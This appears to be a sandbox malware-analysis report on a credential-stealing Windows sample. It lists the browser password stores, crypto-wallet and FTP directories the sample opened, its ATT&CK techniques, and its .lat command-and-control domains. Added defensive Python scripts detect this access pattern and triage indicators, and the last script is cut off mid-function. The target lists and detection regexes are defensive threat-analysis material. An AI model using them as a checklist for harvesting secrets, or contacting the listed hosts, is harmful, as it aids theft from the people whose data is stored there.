                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet (opened twice)
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets (opened twice)
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Roaming\Binance
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe Directory queried: C:\Users\user\Documents
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe Directory queried: C:\Users\user\Documents\NWTVCDUMOB
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe Directory queried: C:\Users\user\Documents\SQRKHNBNYN
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
                Source: C:\Users\user\Desktop\0WO49yZcDA.exe Directory queried: C:\Users\user\Documents\ZTGJILHXQB
                (each of these directories is queried repeatedly during the run; the full report lists every individual query)
                Source: Yara match, file source: 00000000.00000003.2412277604.0000000001996000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: 00000000.00000003.2412704361.0000000001996000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: 00000000.00000003.2503586892.0000000001996000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: 00000000.00000003.2437512461.0000000001996000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: 00000000.00000003.2462451964.0000000001996000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: 00000000.00000003.2462536117.0000000001996000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: Process Memory Space: 0WO49yZcDA.exe PID: 1732, type: MEMORYSTR
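The file-open and directory-query evidence above amounts to a list of what this sample reaches for: the Chromium and Firefox credential stores (Login Data, Network\Cookies, logins.json, key4.db), the Local/Sync Extension Settings directories of browser wallet extensions, desktop wallet directories, and FTP client profiles. As an added example that is not part of the Joe Sandbox report and not the sample's own code, the following Python script turns that evidence into a detection that can be run over file-access events written in the report's own "Source: <process> File opened: <path>" form (it also accepts the web page's glued lines with the "Jump to behavior" link text): it classifies each path, ignores a browser reading its own profile, tallies per process the categories, browser families and distinct extension IDs touched, and flags a foreign process that reads credential stores together with many extension stores, a second browser, or wallet/FTP data. The category regexes, the owner table, the threshold and the sample events are constructed for the example; the sample paths themselves are ones the report lists.

```python
"""Score file-access events for the stealer pattern evidenced above. Added example,
not code from the Joe Sandbox report or the sample; the categories, the owner
table, the thresholds and the sample events are constructed for illustration."""
import re
from collections import defaultdict

# Path categories (assumed here); regexes over the Windows path, matched case-insensitively.
CATEGORY_PATTERNS = {
    "browser_credentials": [
        r"\\User Data\\[^\\]+\\Login Data( For Account)?$",
        r"\\User Data\\[^\\]+\\Network\\Cookies$",
        r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\(logins\.json|key4\.db|places\.sqlite|formhistory\.sqlite)$",
    ],
    "extension_storage": [r"\\User Data\\[^\\]+\\(Local|Sync) Extension Settings\\[^\\]+$"],
    "desktop_wallet": [r"\\AppData\\(Roaming|Local)\\(Exodus|Ledger Live|atomic|Coinomi|Bitcoin"
                       r"|Binance|com\.liberty\.jaxx|Electrum|Electrum-LTC|Guarda)(\\|$)"],
    "ftp_client": [r"\\(FTPbox|SmartFTP|FTPGetter|FTPInfo|3D-FTP|FTPRush)(\\|$)"],
}
# Browser profile roots and the executable expected to read them (assumed table);
# reads by the owner are normal, reads by any other process are cross-application.
BROWSERS = {"Chrome": (r"\\Google\\Chrome\\", "chrome.exe"),
            "Edge": (r"\\Microsoft\\Edge\\", "msedge.exe"),
            "Firefox": (r"\\Mozilla\\Firefox\\", "firefox.exe")}
# One event in the report's own line format, with or without the "Jump to behavior"
# link text that the web page glues onto each path.
EVENT_RE = re.compile(r"^Source:\s*(?P<proc>.+?\.exe)\s*(?P<op>File opened|Directory queried):\s*"
                      r"(?P<path>.+?)\s*(?:Jump to behavior)?\s*$")
EXT_RE = re.compile(r"\\(?:Local|Sync) Extension Settings\\([^\\]+)$", re.IGNORECASE)


def classify(path):
    """Category of a path, or None when it is not a known stealer target."""
    for category, patterns in CATEGORY_PATTERNS.items():
        if any(re.search(p, path, re.IGNORECASE) for p in patterns):
            return category
    return None


def profile(lines):
    """Per process: categories, browser families and distinct extension IDs touched."""
    procs = defaultdict(lambda: {"categories": set(), "extensions": set(), "browsers": set()})
    for line in lines:
        m = EVENT_RE.match(line.strip())
        if not m or m.group("op") != "File opened" or (category := classify(m.group("path"))) is None:
            continue
        proc, path = m.group("proc"), m.group("path")
        family = next((f for f, (pat, _) in BROWSERS.items() if re.search(pat, path, re.I)), None)
        if family and proc.rsplit("\\", 1)[-1].lower() == BROWSERS[family][1]:
            continue  # a browser reading its own profile is expected, not evidence
        entry = procs[proc]
        entry["categories"].add(category)
        if family:
            entry["browsers"].add(family)
        if ext := EXT_RE.search(path):
            entry["extensions"].add(ext.group(1).lower())
    return procs


def assess(lines, min_extensions=5):
    """Flag a foreign process that reads credential stores AND also many extension
    stores, several browsers, or wallet/FTP data (rule chosen for this example)."""
    results = {}
    for proc, entry in profile(lines).items():
        cats = entry["categories"]
        secondary = (len(entry["extensions"]) >= min_extensions or len(entry["browsers"]) >= 2
                     or bool(cats & {"desktop_wallet", "ftp_client"}))
        results[proc] = {"categories": sorted(cats), "browsers": sorted(entry["browsers"]),
                         "extension_dirs": len(entry["extensions"]),
                         "flagged": "browser_credentials" in cats and secondary}
    return results


# Constructed sample events in the report's format; the paths are ones the report lists.
STEALER = r"C:\Users\user\Desktop\0WO49yZcDA.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
APPDATA = r"C:\Users\user\AppData"
CHROME_PROFILE = APPDATA + r"\Local\Google\Chrome\User Data\Default"
SAMPLE_EVENTS = [f"Source: {proc} File opened: {path}" for proc, path in [
    (STEALER, CHROME_PROFILE + r"\Login Data"),
    (STEALER, CHROME_PROFILE + r"\Network\Cookies"),
    (STEALER, APPDATA + r"\Local\Microsoft\Edge\User Data\Default\Login Data"),
    (STEALER, APPDATA + r"\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json"),
    (STEALER, CHROME_PROFILE + r"\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn"),
    (STEALER, CHROME_PROFILE + r"\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai"),
    (STEALER, CHROME_PROFILE + r"\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai"),
    (STEALER, CHROME_PROFILE + r"\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph"),
    (STEALER, CHROME_PROFILE + r"\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc"),
    (STEALER, CHROME_PROFILE + r"\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb"),
    (STEALER, APPDATA + r"\Roaming\Exodus\exodus.wallet"),
    (STEALER, APPDATA + r"\Roaming\FTPRush"),
    (CHROME, CHROME_PROFILE + r"\Login Data"),  # the owner reading its own store
    (CHROME, CHROME_PROFILE + r"\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn"),
    (r"C:\Windows\explorer.exe", APPDATA + r"\Roaming\Exodus\exodus.wallet"),  # wallet only
]] + [rf"Source: {STEALER} Directory queried: C:\Users\user\Documents"]

if __name__ == "__main__":
    for proc, verdict in assess(SAMPLE_EVENTS).items():
        print("FLAGGED" if verdict["flagged"] else "ok     ", proc, verdict)
```

Run it directly to print a verdict per process: the sample is flagged (four categories, three browser families, five distinct extension IDs), explorer.exe touching only a wallet file is not, and chrome.exe reading its own profile produces no entry at all. The owner exclusion is the caveat that matters in practice: browsers, password managers and backup agents legitimately read these stores, so the owner table has to be extended for the environment. The strongest signal, and the one this report shows, is a single process reaching across Chrome, Edge and Firefox profiles and into wallet and FTP client directories in one run, which no single browser does.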

                Remote Access Functionality

                Source: Yara match, file source: Process Memory Space: 0WO49yZcDA.exe PID: 1732, type: MEMORYSTR
                Source: Yara match, file source: sslproxydump.pcap, type: PCAP
                Source: Yara match, file source: decrypted.memstr, type: MEMORYSTR
                MITRE ATT&CK Matrix (one line per tactic; the number in brackets is the count the report shows beside a technique; techniques without a number are the matrix template's default cells and match no signature in this report)

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
                Execution: Windows Management Instrumentation [2]; PowerShell [1]; At; Cron; Launchd; Scheduled Task
                Persistence: DLL Side-Loading [1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
                Privilege Escalation: Process Injection [1]; DLL Side-Loading [1]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
                Defense Evasion: Virtualization/Sandbox Evasion [34]; Process Injection [1]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [2]; Software Packing [12]; DLL Side-Loading [1]
                Credential Access: OS Credential Dumping [2]; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
                Discovery: Query Registry [1]; Security Software Discovery [751]; Virtualization/Sandbox Evasion [34]; Process Discovery [2]; File and Directory Discovery [1]; System Information Discovery [223]
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
                Collection: Archive Collected Data [1]; Data from Local System [41]; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
                Command and Control: Encrypted Channel [11]; Non-Application Layer Protocol [2]; Application Layer Protocol [113]; Protocol Impersonation; Fallback Channels; Multiband Communication
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Service Stop
Antivirus detection for the submitted sample (Source | Detection | Scanner | Label):
0WO49yZcDA.exe | 66% | ReversingLabs | Win32.Spyware.Stealc
0WO49yZcDA.exe | 100% | Avira | TR/Crypt.XPACK.Gen
0WO49yZcDA.exe | 100% | Joe Sandbox ML |
No Antivirus matches in the remaining four detection tables.
Contacted domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
discokeyus.lat | 104.21.21.99 | true | false | | high
grannyejh.lat | unknown | unknown | false | | high
sweepyribs.lat | unknown | unknown | false | | high
Domains and URLs from the malware configuration (Name | Malicious | Antivirus Detection | Reputation):
necklacebudi.lat | false | | high
https://discokeyus.lat/api | false | | high
aspecteirs.lat | false | | high
sweepyribs.lat | false | | high
sustainskelet.lat | false | | high
crosshuaht.lat | false | | high
rapeflowwj.lat | false | | high
energyaffai.lat | false | | high
grannyejh.lat | false | | high
discokeyus.lat | false | | high
URLs found in memory (Name | Source | Malicious | Reputation; the Antivirus Detection column is empty for every entry):
https://duckduckgo.com/chrome_newtab | 0WO49yZcDA.exe, 00000000.00000003.2361764158.00000000060DD000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2362069242.00000000060DA000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2361878999.00000000060DA000.00000004.00000800.00020000.00000000.sdmp | false | high
https://duckduckgo.com/ac/?q= | 0WO49yZcDA.exe, 00000000.00000003.2361764158.00000000060DD000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2362069242.00000000060DA000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2361878999.00000000060DA000.00000004.00000800.00020000.00000000.sdmp | false | high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi | 0WO49yZcDA.exe, 00000000.00000003.2415423962.000000000613E000.00000004.00000800.00020000.00000000.sdmp | false | high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743. | 0WO49yZcDA.exe, 00000000.00000003.2415423962.000000000613E000.00000004.00000800.00020000.00000000.sdmp | false | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0WO49yZcDA.exe, 00000000.00000003.2361764158.00000000060DD000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2362069242.00000000060DA000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2361878999.00000000060DA000.00000004.00000800.00020000.00000000.sdmp | false | high
https://discokeyus.lat/c | 0WO49yZcDA.exe, 00000000.00000003.2360354904.0000000001962000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://discokeyus.lat:443/apial | 0WO49yZcDA.exe, 00000000.00000003.2503662736.0000000001962000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000002.2513804197.0000000001962000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2462451964.0000000001962000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://discokeyus.lat:443/apiv6zchhhv.default-release/key4.dbPK | 0WO49yZcDA.exe, 00000000.00000002.2513804197.0000000001962000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://grannyejh.lat:443/api | 0WO49yZcDA.exe, 00000000.00000003.2360354904.0000000001962000.00000004.00000020.00020000.00000000.sdmp | false | high
http://x1.c.lencr.org/0 | 0WO49yZcDA.exe, 00000000.00000003.2412623188.00000000061AD000.00000004.00000800.00020000.00000000.sdmp | false | high
http://x1.i.lencr.org/0 | 0WO49yZcDA.exe, 00000000.00000003.2412623188.00000000061AD000.00000004.00000800.00020000.00000000.sdmp | false | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0WO49yZcDA.exe, 00000000.00000003.2361764158.00000000060DD000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2362069242.00000000060DA000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2361878999.00000000060DA000.00000004.00000800.00020000.00000000.sdmp | false | high
https://discokeyus.lat/apilv | 0WO49yZcDA.exe, 00000000.00000003.2437467589.000000000612C000.00000004.00000800.00020000.00000000.sdmp | false | unknown
https://discokeyus.lat/nlTW | 0WO49yZcDA.exe, 00000000.00000003.2412242953.000000000612C000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2412003165.0000000006129000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2437684688.000000000612C000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2414252491.000000000612C000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2411900089.0000000006129000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2437467589.000000000612C000.00000004.00000800.00020000.00000000.sdmp | false | unknown
https://support.mozilla.org/products/firefoxgro.all | 0WO49yZcDA.exe, 00000000.00000003.2414312883.00000000063C6000.00000004.00000800.00020000.00000000.sdmp | false | high
https://discokeyus.lat/apiiL | 0WO49yZcDA.exe, 00000000.00000002.2515911924.00000000060A1000.00000004.00000800.00020000.00000000.sdmp | false | unknown
https://discokeyus.lat/ddryb | 0WO49yZcDA.exe, 00000000.00000003.2503433908.000000000612C000.00000004.00000800.00020000.00000000.sdmp | false | unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0WO49yZcDA.exe, 00000000.00000003.2361764158.00000000060DD000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2362069242.00000000060DA000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2361878999.00000000060DA000.00000004.00000800.00020000.00000000.sdmp | false | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0WO49yZcDA.exe, 00000000.00000003.2361764158.00000000060DD000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2362069242.00000000060DA000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2361878999.00000000060DA000.00000004.00000800.00020000.00000000.sdmp | false | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | 0WO49yZcDA.exe, 00000000.00000003.2412623188.00000000061AD000.00000004.00000800.00020000.00000000.sdmp | false | high
http://ocsp.rootca1.amazontrust.com0: | 0WO49yZcDA.exe, 00000000.00000003.2412623188.00000000061AD000.00000004.00000800.00020000.00000000.sdmp | false | high
https://www.ecosia.org/newtab/ | 0WO49yZcDA.exe, 00000000.00000003.2361764158.00000000060DD000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2362069242.00000000060DA000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2361878999.00000000060DA000.00000004.00000800.00020000.00000000.sdmp | false | high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta | 0WO49yZcDA.exe, 00000000.00000003.2415423962.000000000613E000.00000004.00000800.00020000.00000000.sdmp | false | high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | 0WO49yZcDA.exe, 00000000.00000003.2414312883.00000000063C6000.00000004.00000800.00020000.00000000.sdmp | false | high
https://ac.ecosia.org/autocomplete?q= | 0WO49yZcDA.exe, 00000000.00000003.2361764158.00000000060DD000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2362069242.00000000060DA000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2361878999.00000000060DA000.00000004.00000800.00020000.00000000.sdmp | false | high
https://discokeyus.lat:443/apifi | 0WO49yZcDA.exe, 00000000.00000003.2360354904.0000000001962000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg | 0WO49yZcDA.exe, 00000000.00000003.2415423962.000000000613E000.00000004.00000800.00020000.00000000.sdmp | false | high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | 0WO49yZcDA.exe, 00000000.00000003.2415423962.000000000613E000.00000004.00000800.00020000.00000000.sdmp | false | high
https://discokeyus.lat/2 | 0WO49yZcDA.exe, 00000000.00000002.2515977981.0000000006137000.00000004.00000800.00020000.00000000.sdmp | false | unknown
https://discokeyus.lat// | 0WO49yZcDA.exe, 00000000.00000003.2360354904.0000000001962000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://discokeyus.lat/ | 0WO49yZcDA.exe, 00000000.00000003.2437467589.000000000612C000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2439195494.00000000019EB000.00000004.00000020.00020000.00000000.sdmp | false | high
http://crt.rootca1.amazontrust.com/rootca1.cer0? | 0WO49yZcDA.exe, 00000000.00000003.2412623188.00000000061AD000.00000004.00000800.00020000.00000000.sdmp | false | high
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref | 0WO49yZcDA.exe, 00000000.00000003.2415423962.000000000613E000.00000004.00000800.00020000.00000000.sdmp | false | high
https://discokeyus.lat/qMZ1L | 0WO49yZcDA.exe, 00000000.00000003.2462352801.000000000612C000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2480307316.000000000612C000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2437684688.000000000612C000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2467059353.000000000612C000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2503433908.000000000612C000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2437467589.000000000612C000.00000004.00000800.00020000.00000000.sdmp | false | unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477 | 0WO49yZcDA.exe, 00000000.00000003.2415423962.000000000613E000.00000004.00000800.00020000.00000000.sdmp | false | high
https://discokeyus.lat/F | 0WO49yZcDA.exe, 00000000.00000003.2385788262.000000000611F000.00000004.00000800.00020000.00000000.sdmp | false | unknown
https://discokeyus.lat:443/api | 0WO49yZcDA.exe, 0WO49yZcDA.exe, 00000000.00000003.2503662736.0000000001962000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2360354904.0000000001962000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000002.2513804197.0000000001962000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2438974726.0000000001962000.00000004.00000020.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2462451964.0000000001962000.00000004.00000020.00020000.00000000.sdmp | false | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0WO49yZcDA.exe, 00000000.00000003.2361764158.00000000060DD000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2362069242.00000000060DA000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2361878999.00000000060DA000.00000004.00000800.00020000.00000000.sdmp | false | high
https://discokeyus.lat/apiTEZG2 | 0WO49yZcDA.exe, 00000000.00000003.2412003165.0000000006129000.00000004.00000800.00020000.00000000.sdmp, 0WO49yZcDA.exe, 00000000.00000003.2411900089.0000000006129000.00000004.00000800.00020000.00000000.sdmp | false | unknown
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
104.21.21.99 | discokeyus.lat | United States | 13335 | CLOUDFLARENETUS | false
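The tables above mix genuine C2 strings with browser defaults (search suggestion endpoints, favicons), certificate-authority URLs (lencr.org, amazontrust.com) and Firefox telemetry that the stealer reads out of browser profiles. The script below is an added triage example, not Joe Sandbox output and not code from the sample: it takes the C2 domain list and a few of the memory-string URLs copied from the tables above, splits them into C2 hits and noise, collapses the carved variants of the same endpoint, and emits Suricata DNS rules for the C2 domains. Its assumptions: the bytes that trail "/api" in strings such as "/apial" or "/apiv6zchhhv.default-release/key4.dbPK" are neighbouring memory contents rather than real path components; Suricata 5 or later rule syntax (dns.query sticky buffer); and a free local SID range starting at 1000000. None of those come from the report.

```python
"""Network-IOC triage for the report above.

Added example; not Joe Sandbox output and not code from the sample's authors.
Input: the malware-configuration C2 domains and a subset of the 'URLs found in
memory' rows, copied from the report.  Output: C2 vs. noise, endpoint counts,
credential-file fragments carved next to the C2 URL, and Suricata DNS rules.
Assumptions (not from the report): Suricata 5+ rule syntax, local SIDs from 1000000.
"""
from collections import Counter
from urllib.parse import urlsplit

# C2 domains from the report's malware configuration / DNS section.
C2_DOMAINS = frozenset({
    "necklacebudi.lat", "aspecteirs.lat", "sweepyribs.lat",
    "sustainskelet.lat", "crosshuaht.lat", "rapeflowwj.lat",
    "energyaffai.lat", "grannyejh.lat", "discokeyus.lat",
})

# Subset of the memory-string URLs from the report.  Strings carved from a
# dump often carry adjacent bytes, which is why one /api endpoint appears as
# "/apial", "/apiiL" or "/apiv6zchhhv.default-release/key4.dbPK".
MEMORY_URLS = [
    "https://discokeyus.lat/api",
    "https://discokeyus.lat:443/apial",
    "https://discokeyus.lat:443/apiv6zchhhv.default-release/key4.dbPK",
    "https://discokeyus.lat/apiiL",
    "https://grannyejh.lat:443/api",
    "https://discokeyus.lat/qMZ1L",
    "https://duckduckgo.com/ac/?q=",
    "https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=",
    "http://x1.c.lencr.org/0",
    "https://support.mozilla.org/products/firefoxgro.all",
]

# Firefox profile files worth flagging; key4.db holds the key protecting logins.json.
FIREFOX_CREDENTIAL_FILES = ("key4.db", "logins.json", "cert9.db")


def hostname(url: str) -> str:
    """Lower-cased host without the port, so 'discokeyus.lat:443' matches 'discokeyus.lat'."""
    host = urlsplit(url).hostname
    return host.lower() if host else ""


def classify(urls, c2_domains=C2_DOMAINS):
    """Split memory-string URLs into C2 hits and noise (browser defaults, CRL/OCSP, telemetry)."""
    c2, noise = [], []
    for url in urls:
        (c2 if hostname(url) in c2_domains else noise).append(url)
    return c2, noise


def normalize_endpoint(url: str):
    """Collapse a carved URL onto its endpoint.

    Returns (endpoint, trailing), where trailing is whatever followed '/api'
    in the dump.  Those bytes are usually the next string in memory and are
    worth keeping as context (see endpoint_summary).
    """
    parts = urlsplit(url)
    base = f"{parts.scheme}://{hostname(url)}"
    if parts.path.startswith("/api"):
        return base + "/api", parts.path[len("/api"):]
    return base + parts.path, ""


def endpoint_summary(urls):
    """Count endpoints and collect trailing fragments that name Firefox credential files."""
    counts = Counter()
    credential_fragments = []
    for url in urls:
        endpoint, trailing = normalize_endpoint(url)
        counts[endpoint] += 1
        if any(name in trailing for name in FIREFOX_CREDENTIAL_FILES):
            credential_fragments.append(trailing)
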